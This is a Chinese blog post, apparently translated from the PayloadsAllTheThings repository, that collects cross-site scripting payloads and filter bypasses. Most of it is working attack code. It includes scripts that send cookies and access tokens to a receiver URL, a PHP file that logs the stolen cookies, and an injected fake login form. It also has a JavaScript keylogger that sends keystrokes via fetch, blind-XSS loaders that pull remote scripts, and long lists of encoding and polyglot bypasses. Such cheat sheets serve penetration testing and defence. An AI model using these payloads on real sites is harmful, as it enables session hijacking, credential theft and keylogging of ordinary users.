XSS相关Payload及Bypass的备忘录（上）

翻译学习准备自用，同时分享给大家，

来自于：

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection#xss-in-wrappers-javascript-and-data-uri

进入正题

跨站脚本攻击（XSS）是一种计算机安全漏洞，通常出现在Web应用程序中。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中，当正常用户访问该页面时，则可导致嵌入的恶意脚本代码的执行，从而达到恶意攻击用户的目的。

目录

- 利用代码或POC	- XSS获取数据	- UI修改	- JavaScript键盘记录器- 标识一个XSS端点- XSS在HTML/应用程序- XSS在JavaScript封装中和URI数据中- XSS在各种文件中（XML/SVG/CSS/Flash/Markdown）- XSS盲打	- XSS Hunter	- 其他XSS盲打工具	- XSS盲打的地方- 万能的XSS代码- 过滤的绕过和一些奇异的Payloads	- 大小写绕过	- 绕过标签黑名单	- 用代码评估绕过单词黑名单	- 不完整的HTML标签绕过	- 绕过字符串的引号	- 绕过Script标签的引号	- 在mousedown事件中绕过引号	- 绕过点（.）的限制	- 绕过字符串的括号	- 绕过括号和分号	- 绕过 onxxxx= 黑名单	- 绕过空格过滤	- Bypass email filter	- 绕过文档黑名单	- 在字符串中使用javascript绕过	- 使用其他方式绕过重定向限制	- 使用其他方式执行alert	- 不使用任何东西绕过 ">"	- 使用其他字符绕过 ";"	- 使用HTML编码绕过	- 使用Katana绕过	- 使用Lontara绕过	- 使用ECMAScript6绕过	- 使用八进制编码绕过	- 使用Unicode编码绕过	- 使用UTF-7编码绕过	- 使用UTF-8编码绕过	- 使用UTF-16be编码绕过	- 使用UTF-32编码绕过	- 使用BOM（浏览器对象模型）绕过	- 使用奇怪的编码绕过- CSP（内容安全策略）绕过- 常见的WAF绕过

---

• 利用代码或POC

• XSS获取数据
  获取管理员cookie或敏感访问令牌，以下Payload会将其发送到接收地址上。

<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script><script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script><script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script><script>new Image().src="http://localhost/cookie.php?c="+localStorage.getItem('access_token');</script>

将收集的数据写入文件中：

<?php$cookie = $_GET['c'];$fp = fopen('cookies.txt', 'a+');fwrite($fp, 'Cookie:' .$cookie.'\r\n');fclose($fp);?>

• UI修改

利用XSS修改HTML页面内容，显示一个伪造的登录表单

<script>history.replaceState(null, null, '../../../login');document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>"</script>

• JavaScript键盘记录器

使用JavaScript键盘记录器来收集敏感数据

<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>

• 标识一个XSS端点

<script>debugger;</script>

• XSS在HTML/应用程序

• 一些基础的XSS

Basic payload<script>alert('XSS')</script><scr<script>ipt>alert('XSS')</scr<script>ipt>"><script>alert('XSS')</script>"><script>alert(String.fromCharCode(88,83,83))</script>
Img payload<img src=x onerror=alert('XSS');><img src=x onerror=alert('XSS')//<img src=x onerror=alert(String.fromCharCode(88,83,83));><img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));><img src=x:alert(alt) onerror=eval(src) alt=xss>"><img src=x onerror=alert('XSS');>"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
Svg payload<svgonload=alert(1)><svg/onload=alert('XSS')><svg onload=alert(1)//<svg/onload=alert(String.fromCharCode(88,83,83))><svg id=alert(1) onload=eval(id)>"><svg/onload=alert(String.fromCharCode(88,83,83))>"><svg/onload=alert(/XSS/)

• HTML5中的一些XSS

<body onload=alert(/XSS/.source)><input autofocus onfocus=alert(1)><select autofocus onfocus=alert(1)><textarea autofocus onfocus=alert(1)><keygen autofocus onfocus=alert(1)><video/poster/onerror=alert(1)><video><source onerror="javascript:alert(1)"><video src=_ onloadstart="alert(1)"><details/open/ontoggle="alert`1`"><audio src onloadstart=alert(1)><marquee onstart=alert(1)><meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<body ontouchstart=alert(1)> // 当手指触摸屏幕时触发<body ontouchend=alert(1)>   // 当手指从屏幕中移走时触发<body ontouchmove=alert(1)>  // 当手指在屏幕中拖动时触发

• XSS使用Script标签（外部Payload）

<script src=14.rs>你可以指定任意有效Payload在 14.rs/#payload 处比如：14.rs/#alert(document.domain)

• 隐藏输入的XSS

<input type="hidden" accesskey="X" onclick="alert(1)">使用 CTRL+SHIFT+X 触发onclick事件

• DOM XSS

#"><img src=/ onerror=alert(2)>

• XSS在JS上下文，payload没有引号/双引号

-(confirm)(document.domain)//; alert(1);//

• XSS URL

URL/<svg onload=alert(1)>URL/<script>alert('XSS');//URL/<input autofocus onfocus=alert(1)>

• XSS在JavaScript封装中和URI数据中

• 使用JavaScript的XSS

javascript:prompt(1)
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
javascript:confirm(1)
我们可以使用16进制/八进制对"javascript:"进行编码\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)\152\141\166\141\163\143\162\151\160\164\072alert(1)
我们可以使用"换行符"java%0ascript:alert(1)   - LF (\n)java%09script:alert(1)   - Horizontal tab (\t)java%0dscript:alert(1)   - CR (\r)
使用转义字符\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
使用换行符和注释 //javascript://%0Aalert(1)javascript://anything%0D%0A%0D%0Awindow.alert(1)

• 使用Data的XSS

data:text/html,<script>alert(0)</script>data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

• 使用VBscript的XSS（只能用于IE浏览器）

vbscript:msgbox("XSS")

• XSS在各种文件中（XML/SVG/CSS/Flash/Markdown）

注意：此处使用XML CDATA的部分，是为了让JavaScript的Payload不会被视为XML标记。

<name>  <value><![CDATA[<script>confirm(document.domain)</script>]]></value></name>

• XML中的XSS

<html><head></head><body><something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script></body></html>

• SVG中的XSS

<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  <script type="text/javascript">    alert(document.domain);  </script></svg>

• SVG中的XSS(简短版)

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg><svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg><svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>

• Markdown中的XSS

[a](javascript:prompt(document.cookie))[a](j a v a s c r i p t:prompt(document.cookie))[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)[a](javascript:window.onerror=alert;throw%201)

• SWF Flash应用中的XSS

IE以外的浏览器: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);

• SWF Flash应用中的XSS

flashmediaelement.swf?jsinitfunctio%gn=alert`1`flashmediaelement.swf?jsinitfunctio%25gn=alert(1)ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swfplupload.flash.swf?%#target%g=alert&uid%g=XSS&moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=truevideo-js.swf?readyFunction=alert(1)player.swf?playerready=alert(document.cookie)player.swf?tracecall=alert(document.cookie)banner.swf?clickTAG=javascript:alert(1);//io.swf?yid=\"));}catch(e){alert(1);}//video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//

• CSS中的XSS

<!DOCTYPE html><html><head><style>div  {    background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");}</style></head>  <body>    <div>lol</div>  </body></html>

• XSS盲打

• XSS Hunter

详细可看：https://xsshunter.com/app

XSS Hunter允许你查找各种跨站点脚本漏洞，包括经常被遗漏的XSS盲打。该服务通过承载专门的XSS探测来工作，这些探测在触发时扫描页面并将有关脆弱页面的信息发送给XSS Hunter服务。

"><script src=//yoursubdomain.xss.ht></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//yoursubdomain.xss.ht");a.send();</script>
<script>$.getScript("//yoursubdomain.xss.ht")</script>

• 其他XSS盲打工具

https://github.com/Netflix-Skunkworks/sleepy-puppyhttps://github.com/LewisArdern/bXSShttps://github.com/firesunCN/BlueLotus_XSSReceiverhttps://github.com/ssl/ezXSS

• 万能的XSS代码

来自：0xsobkyjaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
来自：Ashar Javed">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
来自：Mathias Karlsson" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
来自：Rsnake';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
来自：Daniel Miessler';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>ajavascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*javascript://--></title></style></textarea></script><svg "//' onclick=alert()///</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
来自：@s0md3v-->'"/></sCript><svG x=">" onload=(co\u006efirm)``><svg%0Ao%00nload=%09((pro\u006dpt))()//
来自：http://polyglot.innerht.ml/ （万能的XSS挑战）javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`

文章转自小白帽学习公众号，若有侵权请联系博主。